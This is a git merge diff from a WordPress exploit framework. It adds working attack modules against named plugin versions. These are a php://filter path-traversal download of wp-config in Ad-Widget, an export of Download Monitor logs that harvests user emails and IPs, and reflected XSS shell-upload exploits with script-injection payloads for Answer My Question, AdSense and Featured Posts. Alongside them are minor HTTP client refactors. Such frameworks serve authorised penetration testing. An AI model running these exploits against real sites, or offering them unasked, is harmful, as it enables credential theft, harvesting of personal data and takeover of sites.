Merge branch 'development'

Author: rastating

.gitignore

@@ -103,3 +103,6 @@ typings/
 # Compiled Angular TypeScript
 lib/web/public/app/**/*.js
 lib/web/public/app/**/*.map
+
+# SQLite databases
+db/*

Gemfile

@@ -4,7 +4,7 @@ gem 'mime-types', '>=3.1'
 gem 'nokogiri', '~>1.7.0'
 gem 'require_all', '~>1.4'
 gem 'rubyzip', '~>1.2'
-gem 'slop', '~>4.4.1'
+gem 'slop', '~>4.5'
 gem 'typhoeus', '~>1.1.2'
 
 group :test do

lib/wpxf/net/http_client.rb

@@ -14,6 +14,8 @@ def initialize
 
         initialize_options
         initialize_advanced_options
+
+        @hydra = Typhoeus::Hydra.new(max_concurrency: max_http_concurrency)
       end
 
       # Initialize the basic HTTP options for the module.
@@ -106,6 +108,7 @@ def queue_request(opts, &callback)
         end
 
         @hydra.queue req
+        @hydra.queued_requests
       end
 
       # Execute multiple HTTP requests in parallel queued by {#queue_request}.
@@ -179,13 +182,6 @@ def execute_delete_request(opts)
       def max_http_concurrency
         normalized_option_value('max_http_concurrency')
       end
-
-      # Run the module.
-      # @return [Boolean] true if the module was successful.
-      def run
-        super
-        @hydra = Typhoeus::Hydra.new(max_concurrency: max_http_concurrency)
-      end
     end
   end
 end

lib/wpxf/wordpress/login.rb

@@ -44,11 +44,13 @@ def wordpress_login(user, pass)
   end
 
   private def execute_wp_login_request(user, pass)
+    res = nil
     scoped_option_change('follow_http_redirection', false) do
-      return execute_post_request(
+      res = execute_post_request(
         url: wordpress_url_login,
         body: wordpress_login_post_body(user, pass)
       )
     end
+    res
   end
 end

modules/auxiliary/ad_widget_php_file_download.rb

@@ -0,0 +1,55 @@
+class Wpxf::Auxiliary::AdWidgetPhpFileDownload < Wpxf::Module
+  include Wpxf::WordPress::FileDownload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Ad-Widget <= 2.11.0 Authenticated PHP File Download',
+      author: [
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8789']
+      ],
+      date: 'Apr 04 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('ad-widget', '2.12.0')
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def default_remote_file_path
+    '../wp-config'
+  end
+
+  def working_directory
+    'wp-admin/'
+  end
+
+  def downloader_url
+    normalize_uri(wordpress_url_plugins, 'ad-widget', 'views', 'modal', 'index.php')
+  end
+
+  def validate_result(res)
+    return false unless super(res)
+
+    if export_path.nil?
+      res.body = Base64.decode64(res.body)
+    else
+      content = Base64.decode64(File.read(export_path))
+      File.open(export_path, 'wb') { |f| f.write(content) }
+    end
+
+    true
+  end
+
+  def download_request_params
+    { 'step' => "php://filter/convert.base64-encode/resource=#{remote_file}" }
+  end
+end

modules/auxiliary/download_manager_authenticated_privilege_escalation.rb

@@ -66,6 +66,7 @@ def run
       'payment_account' => '0'
     }
 
+    mod_result = true
     scoped_option_change('follow_http_redirection', false) do
       res = execute_post_request(
         url: full_uri,
@@ -77,10 +78,10 @@ def run
         emit_success "User #{username} now has full admin rights"
       else
         emit_error 'Failed to escalate privileges'
-        return false
+        mod_result = false
       end
     end
 
-    return true
+    mod_result
   end
 end

modules/auxiliary/download_monitor_log_export.rb

@@ -0,0 +1,122 @@
+require 'csv'
+
+class Wpxf::Auxiliary::DownloadMonitorLogExport < Wpxf::Module
+  include Wpxf
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Download Monitor <= 1.9.6 Log Export',
+      desc: %(
+        This module allows a user of any level to export a CSV of the download logs, which
+        includes: Download ID, Version ID, Filename, User ID, User Login, User Email, User IP, User Agent, Date, Status
+      ),
+      author: [
+        'James Golovich',                  # Disclosure
+        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8810']
+      ],
+      date: 'May 05 2017'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'export_path',
+        desc: 'The file to save the export to',
+        required: true
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_readme('download-monitor', '1.9.7')
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def export_path
+    return nil if normalized_option_value('export_path').nil?
+    File.expand_path normalized_option_value('export_path')
+  end
+
+  def process_row(row)
+    return unless row[:user_login] && row[:user_email]
+    emit_success "Found user: #{row[:user_login]} (#{row[:user_email]})", true
+    @users.push(id: row[:user_login], email: row[:user_email], ip: row[:user_ip])
+  end
+
+  def parse_csv(body, delimiter)
+    begin
+      CSV::Converters[:blank_to_nil] = lambda do |field|
+        field && field.empty? ? nil : field
+      end
+      csv = CSV.new(
+        body,
+        col_sep: delimiter,
+        headers: true,
+        header_converters: :symbol,
+        converters: [:all, :blank_to_nil]
+      )
+
+      csv.to_a.map { |row| process_row(row) }
+      return true
+    rescue
+      return false
+    end
+  end
+
+  def execute_download_log_export
+    res = execute_get_request(
+      url: wordpress_url_admin,
+      params: { 'dlm_download_logs' => 'true' },
+      cookie: session_cookie
+    )
+
+    if res.nil?
+      emit_error 'No response from the target'
+      return false
+    end
+
+    if res.code != 200
+      emit_error "Server responded with code #{res.code}"
+      return false
+    end
+
+    res
+  end
+
+  def parse_and_display(content)
+    @users = [{
+      id: 'Username', email: 'E-mail', ip: 'IP Address'
+    }]
+
+    unless parse_csv(content, ',') || parse_csv(content, ';')
+      emit_error 'Failed to parse response, the CSV was invalid'
+      emit_info "CSV content: #{content}", true
+      return false
+    end
+
+    emit_table @users
+  end
+
+  def run
+    return false unless super
+
+    emit_info 'Requesting download logs...'
+    res = execute_download_log_export
+
+    emit_info 'Parsing response...'
+    parse_and_display(res.body)
+
+    emit_info 'Saving export...'
+    File.open(export_path, 'w') { |file| file.write(res.body) }
+    emit_success "Saved export to #{export_path}"
+
+    true
+  end
+end

modules/exploits/adsense_plugin_reflected_xss_shell_upload.rb

@@ -0,0 +1,17 @@
+class Wpxf::Exploit::AdsensePluginReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
+  def initialize
+    super
+
+    update_info(
+      name: 'Google AdSense <= 1.43 Reflected XSS Shell Upload'
+    )
+  end
+
+  def plugin_name
+    'adsense-plugin'
+  end
+
+  def fixed_version
+    '1.44'
+  end
+end

modules/exploits/answer_my_question_reflected_xss_shell_upload.rb

@@ -0,0 +1,39 @@
+class Wpxf::Exploit::AnswerMyQuestionReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Answer My Question <= 1.3 Reflected XSS Shell Upload',
+      author: [
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8800']
+      ],
+      date: 'Apr 24 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_changelog('answer-my-question', 'readme.txt', '1.4')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_plugins, 'answer-my-question', 'modal.php')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'id' => "\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>",
+      'posted' => '1',
+      'notify' => '',
+      'user_email' => Utility::Text.rand_email,
+      'subject' => Utility::Text.rand_alpha(10),
+      'question' => Utility::Text.rand_alpha(10),
+      'answer' => Utility::Text.rand_alpha(10)
+    )
+  end
+end

modules/exploits/bws_featured_posts_reflected_xss_shell_upload.rb

@@ -0,0 +1,18 @@
+
+class Wpxf::Exploit::FeaturedPostsReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
+  def initialize
+    super
+
+    update_info(
+      name: 'Featured Posts <= 1.0.0 Reflected XSS Shell Upload'
+    )
+  end
+
+  def plugin_name
+    'bws-featured-posts'
+  end
+
+  def fixed_version
+    '1.0.0.1'
+  end
+end